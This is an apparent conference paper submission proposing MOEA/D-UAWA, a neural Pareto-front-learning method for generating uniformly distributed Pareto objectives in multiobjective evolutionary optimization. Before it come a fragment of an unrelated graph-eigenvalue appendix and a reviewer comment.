v = \begin{bmatrix} 1 \\ \frac{-\sqrt{3} + 1}{2} \\ \frac{4 + \sqrt{3}}{2} \end{bmatrix}. $$ This example illustrates the existence of a negative eigenvalue, $\lambda = -\sqrt{3}$, in the adjacency matrix of a non-bipartite graph, and the construction of the corresponding eigenvector, $[1, \frac{-\sqrt{3} + 1}{2}, \frac{4 + \sqrt{3}}{2}]$. A.2 6-VERTEX NON-BIPARTITE GRAPH Consider a non-bipartite graph with six vertices, represented by the adjacency matrix, $$ A = \begin{bmatrix} 0 & 1 & 0 & 0 & 0 & 1 \\ 1 & 0 & 1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 1 & 0 & 1 \\ 0 & 0 & 1 & 0 & 1 & 0 \\ 0 & 0 & 0 & 1 & 0 & 1 \\ 1 & 0 & 1 & 0 & 1 & 0 \end{bmatrix}. $$ Employing numerical computation, we uncover three negative eigenvalues for the matrix, namely $\lambda_1 \approx -2.414$, $\lambda_2 \approx -1$, and $\lambda_3 \approx -0.414$, each associated with corresponding eigenvectors: $$ v_1 \approx \begin{bmatrix} -0.354 \\ 0.354 \\ -0.5 \\ 0.354 \\ -0.354 \\ 0.5 \end{bmatrix}, \quad v_2 \approx \begin{bmatrix} 0.5 \\ -0.5 \\ 0 \\ 0.5 \\ -0.5 \\ 0 \end{bmatrix}, \quad v_3 \approx \begin{bmatrix} -0.354 \\ -0.354 \\ 0.5 \\ -0.354 \\ -0.354 \\ 0.5 \end{bmatrix}. $$
W3T9rql5eo
It is interesting to model the preference-to-objective mapping to characterize the PF in a more direct way, but I wonder how can we generate certain Pareto solution given a specific preference from the learned Pareto front. It seems that the proposed model does not explicitly involve the solutions in the decision space.
Uniform as Glass: Gliding over the Pareto Front with Neural Adaptive Preferences Anonymous authors Paper under double-blind review Abstract Multiobjective optimization (MOO) is prevalent in numerous real-world applications, in which a Pareto front (PF) is constructed to display optima under various preferences. Previous methods commonly utilize the set of Pareto objectives (particles) to represent the entire Pareto front. However, the corresponding discrete distribution of the points on the PF is less studied, which may impede the generation of diverse and representative Pareto objectives in previous methods. To bridge the gap, we highlight in this paper the benefits of uniformly distributed Pareto objectives on the PF, which alleviate the limited diversity found in previous multiobjective optimization (MOO) approaches. In particular, we introduce new techniques for measuring and analyzing the uniformity of Pareto objectives, and accordingly propose a new method to generate asymptotically uniform Pareto objectives in an adaptive manner. Our proposed method is validated through experiments on real-world and synthetic problems, which demonstrates its efficacy in generating high-quality uniform Pareto objectives on the Pareto front. 1 Introduction Real-world applications such as recommendation systems (Zheng & Wang, 2022; Jannach, 2022), autonomous agent planning (Xu et al., 2020; Hayes et al., 2022), and industrial design (Schulz et al., 2017; Wang et al., 2011) often involve multiobjective optimization (MOO) problems. For instance, one may expect a robot to strike a balance between its forward speed and energy consumption (Basaklar et al., 2022; Xu et al., 2020). In MOO problems, despite the small objective size, achieving optimal values for all objectives is often extremely challenging. Hence, learning the set of Pareto solutions (Miettinen, 1999) that are not dominated by other solutions and provide different trade-offs among objectives, is a preferable choice for addressing MOO problems. An illustrative example of Pareto solutions for a two-objective problem can be seen in Figure 1. The collection of Pareto solutions is referred to as the Pareto set (PS), with their corresponding objective vectors forming the Pareto front (PF). In the past few decades, a large amount of MOO algorithms have been proposed for constructing a finite set of solutions (dubbed a “population” in MOO) to approximate the Pareto front. The multi-objective evolutionary algorithms (MOEAs) are the most popular methods among them due to their ability to avoid bad local optima and to obtain a set of solutions in a single run (Blank & Deb, 2020; Caramia et al., 2020). The MOEAs can be mainly divided into three different types, namely, the decomposition-based method (e.g., MOEA/D (Zhang & Li, 2007; Zhang et al., 2008; Qi et al., 2014; Ma et al., 2017)), the domination-based method (e.g., NSGAs (Deb et al., 2002a; Ibrahim et al., 2016; Deb & Jain, 2013; Jain & Deb, 2013)), and the indicator-based method (e.g., SMS-EMOA (Beume et al., 2007)). One crucial challenge for the current MOO research is how to efficiently generate a set of Pareto objectives uniformly distributed on the whole Pareto front. Such a uniform objective set can well represent diverse optimal trade-offs among different objectives, which supports flexible decision-making and is desirable for many real-world applications. Although some efforts have been made, the current MOEAs still struggle to obtain a set of uniformly distributed solutions, especially for practical problems with unbalanced objectives and complicated objective landscapes. An illustration example can be found in Figure 1(a), where the solutions generated by classical MOEA/D are biased to a local region and cannot sufficiently cover the Pareto front. In this work, we introduce a theoretical tool to measure the uniformity of Pareto objectives on the Pareto front. The results (Proposition 1 and Theorem 2) illustrate the benefits of uniform Pareto objectives for MOO and explain why previous MOO methods are unable to produce uniform Pareto objectives, both theoretically (Theorem 1) and empirically. Based on these findings, we then propose MOEA/D-UAWA, a practical algorithm in the MOEA/D framework to generate Uniform Pareto objectives on the Pareto front utilizing Adaptive Weight Adjustment. The weight adjustment is guided by a neural model on an estimated Pareto front as illustrated in Figure 1(b). Through extensive experiments, we demonstrate that MOEA/D-UAWA consistently produces high-quality and uniform Pareto objectives for both synthetic and real-world MOO problems and achieves better uniformity of Pareto objectives compared to other MOEAs. The contribution of this paper can be summarized as follows: 1. We present a comprehensive analysis of the uniform Pareto objectives on the Pareto front along with the associated benefits. Additionally, we introduce new tools to measure uniformity and thereby achieve uniform Pareto objectives. 2. We explore the reason behind the inability of previous methods to generate uniformly distributed Pareto objectives. Accordingly, we propose a novel preference adjustment method that utilizes a neural model to represent the Pareto objective distribution, enabling the generation of uniformly distributed solutions on the Pareto front. 3. We perform extensive experiments on synthetic and real-world MOO problems. These experiments demonstrate that our method efficiently generates uniformly distributed Pareto objectives. Compared to previous MOEAs, our method outperforms them in terms of diversity and runtime. For clarity, all the notations used in this paper can be found in Table 4 in Appendix A.2. 2 PRELIMINARIES In this section, we give a brief description of important concepts in MOO. A multiobjective problem, which optimizes \( m \) conflicting objectives, is formally denoted as \[ \min_{x \in \mathcal{X} \subseteq \mathbb{R}^n} f(x) = (f_1(x), \ldots, f_m(x)), \] which admits multiple solutions under different preferences on \( f_i \)'s. For an MOO problem, it is difficult to compare two solutions simply. The concepts of domination and Pareto solutions are thereby introduced. **Definition 1 (Domination).** A solution \( x^{(a)} \) dominates \( x^{(b)} \) if there exists \( i \in [m] \) such that \( f_i(x^{(a)}) < f_i(x^{(b)}) \) and \( \forall j \in [m] \setminus \{i\}, f_j(x^{(a)}) \leq f_j(x^{(b)}) \). **Definition 2 (Pareto solution).** A solution \( x \) is a Pareto solution if no other solution \( x' \in \mathcal{X} \) dominates it. The set of all Pareto solutions is denoted as the Pareto set \( \text{PS} \), and its image set \( \mathcal{T} \), where \( \mathcal{T} = (f \circ \text{PS}) \) is referred to as the Pareto front (\( \text{PF} \)). The dominance of a solution \( x^{(a)} \) over another solution \( x^{(b)} \) implies that \( x^{(a)} \) is strictly superior to \( x^{(b)} \), which indicates that \( x^{(b)} \) cannot be regarded as an optimum in MOO. We additionally explain the concept of weakly Pareto solution, which will be used later in this paper: \( x^{(a)} \) is a weakly Pareto solution if there is no other solution \( x^{(b)} \in \mathcal{X} \) such that \( f(x^{(b)}) \prec f(x^{(a)}) \), where \( f(x^{(b)}) \prec f(x^{(a)}) \) means \( f_i(x^{(b)}) < f_i(x^{(a)}) \) for all \( i \in [m] \). Figure 2: An \( \lambda \)-exact Pareto solution is the intersection between the Pareto front and vector \( \lambda \). Definition 3 (Pareto objective). For a Pareto solution \( x, y = f(x) \in \mathbb{R}^m \) is the Pareto objective on the Pareto front \( T \). It is very difficult to directly optimize all \( m \) objective \( f(x) \) due to their conflicting nature. A more practical approach is to convert the objective vector \( f(x) \) into a single objective subproblem via the aggregation function \( g(\cdot, \lambda) \) with a specific preference vector \( \lambda \in \Omega \) as arguments to generate a specific Pareto solution (see the rigid definition in Appendix A.1), where \( \Omega \) is the support set of preference vectors. Many scalarization methods have been proposed in the past few decades, and this work focuses on the modified Tchebycheff (“mtche” in short) aggregation function (Ma et al., 2017) with attractive property: \[ g_{\text{mtche}}(y, \lambda) = \max_{i \in [m]} \left\{ \frac{y_i - z_i}{\lambda_i} \right\}, \quad g_{\text{mtche}}(\cdot, \lambda) : \mathbb{R}^m \mapsto \mathbb{R}, \] (2) to produce \( \lambda \)-exact Pareto solutions (Mahapatra & Rajan, 2020) under mild conditions, where \( z \) is a reference point. The optimal Pareto objective \( y^* \) for the above problem (2) follows the pattern \[ \frac{y_1^* - z_1}{\lambda_1} = \ldots = \frac{y_m^* - z_m}{\lambda_m} = C \] with some positive constant \( C \) (as shown in Figure 2). 3 RELATED WORK Since we use an adaptive preference adjustment (AWA) by a neural model, we shall discuss the difference between previous AWAs in Section 3.1. Then we show how previous MOO methods use a neural model and discuss the differences with them in Section 3.2. Finally, we discuss the benefits of the proposed method compared with gradient-based MOO methods in Section 3.3. 3.1 MOEA/D WITH ADAPTIVE PREFERENCE ADJUSTMENT (MOEA/D-AWA) MOO researchers have proposed to use adaptive weight adjustments to achieve a more diverse Pareto objectives, including PaLam (Siwei et al., 2011), Adaptive-MOEA/D (Li & Landa-Silva, 2011), and MOEA/D-AWA (Qi et al., 2014). Compared to our proposed method, previous methods mainly use manually-crafted rules to adjust preferences, e.g., MOEA/D-AWA removes the most crowded solution and retains the most sparse solution. The proposed method is instead motivated by a theoretical analysis of the final solution distribution (c.f. Proposition 2), and utilizes a neural model to accelerate optimization process. 3.2 LEARNING THE PARETO FRONT/SET BY A NEURAL MODEL Pareto set learning (PSL) (Navon et al., 2020; Lin et al., 2022) aims to learn the entire Pareto set through a single neural model \( x_\beta(\cdot) : \Delta_{m-1} \mapsto \mathbb{R}^n \), which maps a preference vector to a Pareto solution. A PSL model \( x_\beta(\cdot) \) is trained by the following loss minimization: \[ \min_\beta \text{psl\_loss}(\beta) = \mathbb{E}_{\lambda \sim \text{Unif}(\Delta_{m-1})} \left[ g(f \circ x_\beta(\lambda), \lambda) \right], \] (3) which is usually optimized by gradient descent (e.g., in Lin et al. (2022)). The gradient involved is computed by the chain rule: \( \nabla_\beta \text{psl\_loss}(\beta) = \mathbb{E}_{\lambda \sim \text{Unif}(\Delta_{m-1})} \frac{\partial g}{\partial f} \frac{\partial f}{\partial x} \frac{\partial x}{\partial \beta} \). Previous PSL methods sometimes fail to return globally optimal model when the objective \( f(\cdot) \) has too many local optima. We note our proposed Pareto front learning (PFL) model differs from PSL model. Firstly, as mentioned, PSL is a purely gradient-based method that cannot handle local optima, whereas PFL is only adapted as a tool for preference adjustment in evolutionary optimization, which can produce globally optimal solutions in MOO (Zhou et al., 2019). Furthermore, the model size in PSL can be large when there is a huge amount of decision variables (\( n \)), whereas the size of PFL remains as PFL addresses the constant objective space. It is suggested by Hamada et al. (2020) and Roy et al. (2023), even in cases where the objectives \( f_i \)'s and Pareto front are simple and convex, the Pareto set can exhibit a complex structure, posing challenges for PSL. \(^1\) \( \Delta_{m-1} \) denotes the \((m-1)\)-dimensional simplex, defined as \( \Delta_{m-1} = \{ y | \sum_{i=1}^{m} y_i = 1, \ y_i \geq 0. \} \) 3.3 Gradient-based MOO In the growing trend of MOO, gradient-based methods are mainly adopted to optimize MOO problems. MOO-SVGD (Liu et al., 2021) employs Stein Variational Gradient Descent to achieve a diverse Pareto solution set. Another approach by Chen & Kwok (2022) utilizes a PSL model to optimize diversity or hypervolume of a Pareto solution set. EPO (Mahapatra & Rajan, 2020) and OPT-in-Pareto (Ye & Liu, 2022) focus on finding a single Pareto solution that satisfies specific user requirements. Despite the wide usage, gradient-based MOO methods, as just mentioned in the last subsection, often struggle to produce globally optimal solutions (see a concrete example in Appendix B.6), whereas the proposed method aims to achieve global optimal MOO solutions. 4 The Proposed MOEA/D-UAWA Method In this section, we present a novel method for generating uniformly distributed Pareto objectives on the PF. We highlight the theoretical benefit of uniform objectives as Property 1 in Section 4.2 and use Theorem 2 to bound the predicting error of the whole PF by uniform objectives in Section 4.5. Before introducing our method, we provide a theoretical analysis (Section 4.1) on why MOEA/D fails to achieve uniform objectives, and then we develop practical algorithms and discuss the theoretical guarantees of our proposed method in the remaining sections. 4.1 Distribution of Pareto Objectives by MOEA/D Previous methods (Deb et al., 2019; Blank et al., 2020) focusing on generating well-spaced (uniform) preferences. We argue that, uniform preferences may lead to non-uniform Pareto objectives. An illustrated example is given in Figure 1. To describe that, we use Theorem 1 to describe the distribution of Pareto objectives by MOEA/D. We use the preference-to-objective function, denoted as \( h(\cdot) : \Delta_{m-1} \mapsto \mathbb{R}^m \), to represent the mapping from a preference \( \lambda : \lambda \in \Omega \) to Pareto objectives, \[ y = h(\lambda) = \arg \min_{y \in \mathcal{Y}} g^{\text{mche}}(y, \lambda), \] where \( \mathcal{Y} \) is the objective space, \( \mathcal{Y} = f \circ \mathcal{X} \). We use \( \Lambda_N : \Lambda_N = \{\lambda^{(1)}, \ldots, \lambda^{(N)}\} \) to denote a uniform preference set, where \( \Lambda_N \) solves the optimization problem, \[ \max_{\Lambda_N \subset \Omega} \min_{i,j \in [N], i \neq j} \rho(\lambda^{(i)}, \lambda^{(j)}) \quad (\text{Blank et al., 2020}). \] Here, \( \rho(\cdot, \cdot) \) denotes the Euclidean distance between two vectors. We first give the condition of such function \( h \) is well defined, i.e., the objective \( y \) solves Problem (4) is unique as Lemma 1. This Lemma will also be used to build the PFL model in Section 4.3. **Lemma 1** (The condition of function \( h(\cdot) \) is well defined). If the objective function \( f(\cdot) \) does not have weakly Pareto solutions, the optimal objective \( y^* \) that solves Equation 4 is a unique Pareto objective. This implies that the function \( h(\cdot) \) is well-defined. As function \( h \) is well-defined, we provide the following theorem to give the distribution of Pareto objectives \( Y_N : Y_N = h \circ \Lambda_N \). **Theorem 1** (Distribution of Pareto objectives). \( \tilde{Y}_N \xrightarrow{d} h \circ \text{Unif}(\Omega) \), where \( \tilde{Y}_N \) is the uniform distribution over \( Y_N \), \( Y_N = \{y^{(1)}, \ldots, y^{(N)}\} \). The notation "\( \xrightarrow{d} \)" indicates convergence in distribution, and \( \text{Unif}(\Omega) \) denotes the uniform distribution over set \( \Omega \). **Remark 1.** Theorem 1 indicates that, only in special cases (e.g., the function \( h \) is an affine mapping), uniformity in preference space induces uniformity in the Pareto objective space. We can give a concrete example, by setting \( \Omega = \Delta_2 \) and the objective function \( f \) as the DTLZ1 (Deb et al., 2002b) function. The detailed discussions and proofs for this example are in Appendix C.4. However, even when \( h \) is a simple quadratic function, \( h \circ \text{Unif}(\Omega) \) is not a uniform distribution. The proof of Lemma 1 and Theorem 1 is provided in Appendix C.5 and C.6. \( ^2\Omega \) is assumed to be a compact and connected set. Figure 3: The proposed framework consists of three parts: training the PFL model, updating new preferences (Equation (7)), and MOEA/D. The black solid arrows represent value transfer, and the red dash arrows represent gradient updates. 4.2 The Proposed MOEA/D-UAWA Framework Maximal-Manifold-Separation problem. To generate uniformly distributed Pareto objectives, we propose to construct the objective configuration $\mathcal{Y}_N^*$ by solving the Maximal-Manifold-Separation (MMS) problem on the Pareto front $\mathcal{T}$, $$\text{MMS}(\mathcal{T}) = \max_{\mathcal{Y}_N} \delta_\tau = \max_{\mathcal{Y}_N} \left( \min_{y^{(i)} \neq y^{(j)} \in \mathcal{Y}_N, \mathcal{Y}_N \subset \mathcal{T}} \rho(y^{(i)}, y^{(j)}) \right),$$ where $\rho(\cdot, \cdot)$ denotes the Euclidean distance between two vectors. Intuitively, Problem (5) maximizes the minimum pair-wise distances on $\mathcal{T}$, resulting in a diverse configuration $\mathcal{Y}_N^*$. The optimal separation solving Problem (5) is denoted as $\delta_\tau^*$. We formally summarize attractive properties of the optimal configuration $\mathcal{Y}_N^*$ solving Problem equation (5), and invite readers to refer to Appendix C.3 for the proof and additional details. Specifically, Proposition 1 depicts the non-asymptotic property for a fixed sample size $N$, while Proposition 2 yields the asymptotic result. Proposition 1 (Covering and $\delta$-Dominance). Under certain assumptions (Appendix C.3), The optimal configuration $\mathcal{Y}_N^*$ serves as a $\delta_\tau^*$-packing and a $\delta_\tau^*$ covering, ensuring that all Pareto objectives in $\mathcal{Y}_N^*$ $\delta_\tau^*$-dominate any Pareto objectives on the Pareto front $\mathcal{T}$. (The definitions of packing, covering, and $\delta$-dominance can be found in Appendix A.1.) In other words, for every $y' \in (f \circ \Omega)$, there exists $y \in \mathcal{Y}_N^*$ such that $y$ $\delta_\tau^*$-dominates $y'$. Proposition 2 (Asymptotic Uniformity. (Borodachov et al., 2007)). $\mathcal{Y}_N^*$ is asymptotically uniform on $\mathcal{T}$, i.e., $\hat{\mathcal{Y}}_N^* \xrightarrow{d} \text{Unif}(\mathcal{T})$, where $\hat{\mathcal{Y}}_N^*$ is the empirical distribution over $\mathcal{Y}_N^*$. Remark 2. Proposition 1 suggests that the objectives $\mathcal{Y}_N^*$ obtained from solving Problem (5) possess a strong representation ability of the entire Pareto front. This means that for any objective in $\mathcal{T}$, there exists at least one objective in $\mathcal{Y}_N^*$ that can approximate it within an error tolerance $\delta_\tau^*$. Additionally, Proposition 2 indicates that as the sample size $n$ increases, $\mathcal{Y}_N^*$ becomes increasingly similar to a uniform distribution. Overview of the framework: solving MMS on the unknown Pareto front $\mathcal{T}$. Since the true PF $\mathcal{T}$ is unknown, as shown in Figure 3, we iteratively estimate $\mathcal{T}$ by Pareto front learning (PFL) and repick the preferences for PFL by solving MMS. There are multiple components in the framework. (①) The proposed framework is built upon the decomposition-based multiobjective evolutionary algorithm (MOEA/D), where we utilize a set of preference angles $\Theta_N = \{\theta^{(1)}, \ldots, \theta^{(N)}\} \subset [0, \frac{\pi}{2}]^{m-1}$ as the inputs for MOEA/D. ① The Pareto Front Learning (PFL) module is then trained using the --- 3The angle representation is chosen for its simplicity in optimization with box constraints, and a preference angle along with its corresponding preference is presented in Appendix A.3. true objectives obtained from the output of MOEA/D. (2) Subsequently, the preference angles are updated by optimizing the uniformity indicator. More detailed descriptions of (1) the PFL model and (2) the preference update components are provided separately in the subsequent sections. The practical algorithm is implemented as Algorithm 1 and 2 in Appendix A.4, where we also present time complexity analysis. Practically, training time of the PFL and preference adjustment is less than $1$ s, which is neglectable compared with MOEAs. ### 4.3 Pareto Front Learning (PFL) | Method | Mapping function ($n \gg m$) | |--------|-----------------------------| | Pareto Set Learning (PSL) (Navon et al., 2020; Chen & Kwok, 2022) | $\Delta_{m-1} \mapsto \mathbb{R}^n$ | | (Proposed) Pareto front Learning (PFL) | $[0, \frac{\pi}{2}]^{m-1} \mapsto \mathbb{R}^{m-1}$ | The PFL model, denoted as $h_\phi(\cdot) : [0, \frac{\pi}{2}]^m \mapsto \mathbb{R}^{m-1}$, serves as an approximation of the “preference to objective” function $h(\cdot)$ introduced in Section 4.1. The $h_\phi(\cdot)$ is trained by minimizing the Mean Square Error (MSE) loss between the true Pareto objectives $y$ obtained from MOEA/D and the estimated objectives $h_\phi(\theta)$. For a well-defined training process, two different objectives $y$ and $y'$ cannot both be the optimal value of $g_{\text{miche}}(\cdot, \lambda)$ for a given preference at the same time. The condition for this property is provided in Lemma 1. We emphasize the necessity of introducing PFL rather than simply applying previous Pareto set learning methods (Equation (3)) (Navon et al., 2020; Lin et al., 2022; Chen & Kwok, 2022). The reasons are twofold. (1) PSL simply uses gradient-based methods to optimize the PSL objective function defined in Equation (3). The induced locally optimal solutions make PSL fail on most of ZDT, DTLZ problems. (2) The number of decision variables $n$ of an MOO problem can be arbitrarily large, and therefore so can be the size of PSL model. In contrast, the PFL model is constrained in the function space $[0, \frac{\pi}{2}]^{m-1} \mapsto \mathbb{R}^{m-1}$, which implies its complexity is independent of $n$. We focus on two quantities for a PFL model: (1) the **training loss**, denoted as $l_{\text{pfl}}$, and (2) the **generalization error** for a new angle $\theta'$ after applying the uniform configuration specified in Equation (5). By Allen-Zhu et al. (2019), we can prove the training loss $l_{\text{pfl}}$ converges to a globally optimal solution in polynomial time w.r.t to number of solutions $N$ and width of the neural model. The discussion on the generalization error is deferred to Section 4.5. ### 4.4 Preference Adjustment with a PFL Model Exactly solving Problem (5) for the optimal configuration is generally an intractable problem (Borodachov et al., 2019). We consider the following surrogate problem in which the preference-to-objective map $h(\cdot)$ is approximated by a neural network $h_\phi(\cdot)$, $$\text{MMS}(\hat{T}) = \max_{\Theta_N} \delta_{\hat{T}} = \max_{\Theta_N} \left( \min_{i \neq j, i,j \in [N]} \rho(h_\phi(\theta^{(i)}), h_\phi(\theta^{(j)})) \right)$$ We find that, given a fixed neural network $h_\phi(\cdot)$ (the PFL model), the preference angles $\theta_i$’s in Problem (6) (as well as the estimated solutions $\hat{y}^{(i)}$’s) can be optimized efficiently via projected gradient ascent method, $\theta^{(i)} \leftarrow \text{Proj}(\theta^{(i)} + \eta \nabla_{\theta^{(i)}} \delta_{\hat{T}}), i \in [N]$. The Proj operator projects a preference angle back to its domain $[0, \frac{\pi}{2}]$. The updated rule can be written compactly as the following equation, \[ \Theta_N \leftarrow \text{Proj}(\Theta_N + \eta \nabla_{\Theta_N} \hat{\delta}_T). \] (7) Figure 4 demonstrates that, using a PFL model, with only a few Pareto objectives we can effectively estimate the whole Pareto front. The blue dots represent the original Pareto objectives optimized by MOEA/D, which are not uniformly distributed due to Theorem 1; the adjusted preferences are indicated by red stars in the 1-D simplex. After updating preferences using gradient ascent, Pareto objectives are distributed uniformly in the estimated Pareto front, as described in Proposition 2. 4.5 PFL Generalization Bound We focus our attention on bounding the generalization error of our proposed methods, namely \( \tilde{\epsilon} = |R(\tilde{h}) - \hat{R}(\tilde{h})| \) for an arbitrary \( \tilde{h}(\cdot) \). As we have highlighted in Appendix C.1, the population risk of \( \tilde{h} \) can be controlled via bounding such generalization error. Specifically, we show that the regret error \( \tilde{\epsilon} = |R(h) - \hat{R}(h)| \) heavily depends on the margin \( \delta_v \). The \( \delta_v \) represents for the maximal diameter of the Voronoi cells (Okabe et al., 2009) guided by the Pareto objective \( Y_N = \{y^{(1)}, \ldots, y^{(N)}\} \), where \( Y_N \) solves Equation (5). For the formal definition of Voronoi cells and diameter of a set, please refer to Definitions 8 and 9 in the Appendix A.1. The complete results are stated as follows (the proof of Theorem 2 is provided in Appendix C.2): **Theorem 2** (Generalization bound of a PFL model). We first make some regularity assumptions: 1. **(Function smoothness).** Both \( (\tilde{h} - h_*)(x) \) and \( h_*^{-1}(y) \) are \( L \)- and \( L' \)-Lipschitz, respectively, i.e., \[ \|(\tilde{h} - h_*)(x_1) - (\tilde{h} - h_*)(x_2)\| \leq L \|x_1 - x_2\|, \quad \forall x_1, x_2 \in [0, \frac{\pi}{2}]^{m-1}, \] \[ \|h_*^{-1}(y_1) - h_*^{-1}(y_2)\| \leq L' \|y_1 - y_2\|, \quad \forall y_1, y_2 \in \mathbb{R}^m, \] (8) where \( h_* \) denotes the true mapping function from preferences to objectives. 2. **(Function upper bound).** \( \|\tilde{h} - h_*\|_\infty \leq A, \quad \|h_*^{-1}\|_\infty \leq A' \). 3. **(Manifold property).** We assume \( T \) is a differentiable, compact \((m-1)\)-D manifold, a common assumption found, for example, in (Hillermeier, 2001). Furthermore, we consider \( T \) to be connected, a widely applicable assumption in scenarios such as ZDT 1, 2, 4. For the risk \( \tilde{\epsilon} = |R(\tilde{h}) - \hat{R}(\tilde{h})| \), we then have \[ \tilde{\epsilon} \leq 2H_{m-1}(T)AA'LL'\delta_v + 2CA^2 \sqrt{W_1(U, \tilde{Y}_N)} + \delta_v, \] (9) where \( U \) is the uniform distribution over \( T \), \( \tilde{Y}_N \) is the empirical distribution of \( Y_N \), \( W_1(\cdot, \cdot) \) is the Wasserstein distance with the \( l_1 \) norm, \( H_{m-1}(\cdot) \) is the Hausdorff dimension function, and \( C \) is some universal constant representing the smoothness of \( T \) (Chae & Walker, 2020, Thereom 1). **Remark 3.** In Theorem 2 the error bound for \( \tilde{\epsilon} \) involves two quantities, the diameter of the Voronoi cell \( \delta_v \) and \( W_1(U, \tilde{Y}_N) \). The margin \( \delta_v \) is controlled through maximizing the minimal separation distance \( \delta_T \). The decaying rate of \( W_1(U, \tilde{Y}_N) \) is impacted by not only the margin \( \delta_v \), but also the manifold properties of the Pareto front. I.e., the overall generalization error rate is not completely decided by the margin \( \delta_v \). However, by Proposition 2, we still have \( W_1(U, \tilde{Y}_N) \rightarrow 0 \) since \( \tilde{Y}_N \) weakly converges to \( U \), and minimizing the margin \( \delta_v \) is thus critical to the control of the generalization error \( \tilde{\epsilon} \). 5 Experiments 5.1 Experiment Settings We validate the effectiveness of the proposed method on various problems, including ZDT1, 2, 4 (Deb et al., 2006), DTLZ 1-2 (Deb et al., 2002b), and real-world testing problems (Tanabe & Ishibuchi, 2020). For the ease of presentation, we normalize the PF of RE37 to \([0, 1]^3\). To test the ability of dealing objectives of different scales, we normalize the PFs of RE21 and RE22 to $[0, 0.5] \times [0, 1]$. Problem ZDT4 and DTLZ 1-2 possess numerous locally optima that cannot be identified by gradient-based MOO methods (see Appendix B.6). REX problems are real-world problems with unknown Pareto fronts, demonstrating the capability to handle complex Pareto front shapes. Lastly, there are multiple preference vectors that do not intersect with the RE37 Pareto front, leading to duplicate Pareto objectives by the original MOEA/D. Results on RE37 validate the proposed method can automatically avoid selecting such preferences leading to duplicate solutions, thereby enhancing solution diversity. The implementation in this study relies on the pymoo (Blank & Deb, 2020) and PyTorch (Paszke et al., 2019) libraries. We utilize the simulated binary crossover (SBX) operator and polynomial mutation technique (Deb & Beyer, 2001) for MOEA/D-based methods. Following the setting in pymoo, we do not maintain an external population (EP), since it can be computationally and storage intensive, particularly when dealing with many objectives (Li & Landa-Silva, 2011). We compare our method with (1) the vanilla MOEA/D (Zhang & Li, 2007), (2) NSGA2 (Deb et al., 2002a), (3) MOEA/D with adaptive weight adjustment (MOEA/D-AWA) (Qi et al., 2014), (4) PaLam (Siwei et al., 2011), and (5) SMS-EMOA (Beume et al., 2007). Detailed descriptions of these methods and implementations are deferred to Appendix B.1. To assess the performances, we utilize the hypervolume ($HV$) (Guerreiro et al., 2020), the sparsity ($\downarrow$) (Xu et al., 2020), the spacing ($\downarrow$) (Schott, 1995), the minimal distance on the Pareto front ($\delta_T$) (↑), and its soft version ($\tilde{\delta}_T$) (↑) indicators. Please refer to Appendix B.2 for detailed descriptions of these indicators. ### Table 2: The running time (every 1k generations) of SMS-EMOA and the proposed method. | Method | Running Time (m) | |--------------|------------------| | SMS-EMOA | 1.21 | | Proposed | 0.56 | 5.2 RESULTS The average results on five random seeds for the problems are displayed in Table 5 in Appendix B.4, along with the visualization results in Figure 10-17. Detailed discussions on these results are pro- Table 3: Results on all problems averaged on five random seeds, with the optimal indicators among all problems highlighted in bold. For results on all problems, please refer to Appendix B.4 | Problem | Method | HV (↑) | Spacing (↓) | Sparsity (↓) | $\delta_T$ (↑) | $\tilde{\delta}_T$ (↑) | |---------|------------|--------|-------------|--------------|----------------|------------------| | RE21 | NSGA2 | 1.226 | 0.066 | 0.022 | 0.024 | -0.063 | | | SMS-EMOA | 1.252 | 0.028 | 0.017 | 0.095 | -0.028 | | | MOEA/D | 1.246 | 0.086 | 0.024 | 0.072 | -0.058 | | | MOEA/D-AWA | 1.250 | 0.028 | 0.017 | 0.088 | -0.031 | | | PaLam | **1.252** | **0.025** | **0.017** | **0.101** | **-0.027** | | | Proposed | 1.252 | **0.002** | **0.016** | **0.123** | **-0.020** | | RE37 | NSGA2 | 1.051 | 0.069 | 0.005 | 0.013 | -0.140 | | | SMS-EMOA | **1.114** | **0.041** | 0.005 | 0.029 | -0.128 | | | MOEA/D | 1.052 | 0.072 | 0.013 | 0 | -0.204 | | | MOEA/D-AWA | 1.091 | 0.078 | 0.009 | 0.001 | -0.177 | | | PaLam | 1.112 | 0.076 | 0.006 | 0 | -0.174 | | | Proposed | 1.110 | 0.045 | **0.005** | **0.040** | **-0.086** | Due to the presence of numerous local optima, gradient-based multi-objective optimization (MOO) methods fail in certain problems. We provide a concrete example of the failure of gradient MOO in Appendix B.6. Key findings from the experiments are summarized in the following section. ① The proposed method achieves the optimal spacing indicator, as shown in Figure 5 and Table 3, for two-objective problems. The spacing indicator is very close to zero, indicating that the distances between adjacent solutions are nearly equal. In comparison to the MOEA/D (Figure 5-(a)), the proposed method generates more uniform objectives. The MOEA/D solutions are denser in the bottom-right area and sparser in the upper-left region, which cannot effectively cover the entire PF when compared to the proposed method. ② We observed that the HV-based method, SMS-EMOA, generated more diverse solutions compared to MOEA/D in RE21 and RE22 (see Table 5 in Appendix B.4). On the RE37 problem, numerous preferences did not intersect with the Pareto front, leading to the production of numerous duplicate Pareto objectives ($\tilde{\delta}_T = 0$) by MOEA/D. The proposed method mitigates the problem of duplicate Pareto objectives generated by MOEA/D through adaptive weight adjustment. Figure 6 and Table 3 demonstrate that the solutions generated by the proposed method possess the most uniform distribution on the Pareto front. Notably, the HV-based method in RE37 tends to produce solutions on the boundary of the Pareto front, which may not be desirable compared to the proposed method in certain applications. ③ Despite the general belief that hypervolume-based methods can generate diverse solutions in multi-objective optimization (MOO) (Auger et al., 2012; Guerreiro et al., 2020), our findings (see Table 5 in Appendix B.4 and Figure 9 in Appendix B.3) reveal that hypervolume indicators can be very similar, while the distribution of solutions can vary significantly. This highlights the need to utilize a novel indicator, as proposed, for measuring and optimizing the Pareto objectives for MOO. Furthermore, the proposed method is 4.5x faster than SMS-EMOA on RE37 (Table 2), since the proposed method only estimate and optimize the uniformity of a solution set only with minimal iterations. In most cases, the proposed method is optimized by MOEA/D under fixed preferences obtained from the neural PFL model. 6 CONCLUSIONS This paper addresses a long-standing open problem in multiobjective evolutionary algorithms (MOEAs): the generation of a finite set of diverse/uniform Pareto objectives. It is the first paper to rigorously analyze the distribution of Pareto objectives, which sheds light on the understanding of solution generation in MOEAs. Building upon these analytical findings, the paper introduces a novel algorithm that achieves a uniform Pareto objective set through adaptive weight adjustment. In future research, we focus our attention on the acceleration of the optimization process and the application of the algorithm to large-scale MOO problems. REFERENCES Zeyuan Allen-Zhu, Yuanzhi Li, and Zhao Song. A convergence theory for deep learning via over-parameterization. In International 